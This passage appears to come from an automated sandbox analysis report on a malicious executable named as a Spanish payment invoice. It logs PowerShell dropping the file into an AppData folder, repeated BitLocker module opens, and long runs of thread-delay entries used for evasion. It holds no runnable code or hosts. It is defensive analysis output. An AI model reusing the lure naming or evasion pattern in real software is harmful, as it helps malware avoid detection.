            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00BCCA78 push eax; mov dword ptr [esp], edx1_2_00BCCA8C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_072759F9 push edi; retf 1_2_072759FA
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EE29E0 push eax; ret 4_2_20EE3CA5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_20EE3C90 push eax; ret 4_2_20EE3CA5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599885Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599641Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594954Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594829Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594704Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594579Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594454Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594329Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594204Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594079Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 593954Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7112Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2588Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep count: 35 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -32281802128991695s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028Thread sleep count: 939 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599885s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028Thread sleep count: 8870 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep count: 42 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599641s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599531s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599313s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599188s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598829s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598704s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598579s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598454s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598329s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598204s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -598079s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597829s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597704s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597579s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597454s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597329s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597204s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -597079s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596829s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596704s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596579s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020Thread sleep time: -596454s >= -30000sJump to behavior
